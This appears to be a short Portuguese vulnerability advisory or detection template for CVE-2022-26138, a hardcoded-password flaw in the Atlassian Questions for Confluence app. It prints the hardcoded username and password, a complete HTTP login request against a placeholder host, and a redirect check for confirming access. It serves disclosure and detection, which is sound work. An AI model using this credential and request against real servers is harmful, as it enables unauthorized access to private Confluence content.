
Senha Codificada do Atlassian Questions (CVE-2022-26138)

O aplicativo Atlassian Questions For Confluence para Confluence Server e Data Center
cria uma conta de usuário do Confluence no grupo confluence-users com
o nome de usuário disabledsystemuser e uma senha fixa (hardcoded). Um invasor remoto,
não autenticado, de posse da senha fixa, poderia
explorar isso para fazer login no Confluence e acessar todo o conteúdo acessível
aos usuários do grupo confluence-users.
Essa conta de usuário é criada ao instalar as versões 2.7.34, 2.7.35 e 3.0.2 do aplicativo.
Credenciais hardcoded:
disabledsystemuserdisabled1system1user6708POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded
os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
Se o servidor redirecionar para /vulnerable.action, as credenciais são válidas.
As credenciais hardcoded estavam simplesmente presentes dentro dos arquivos jar do plugin afetado
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar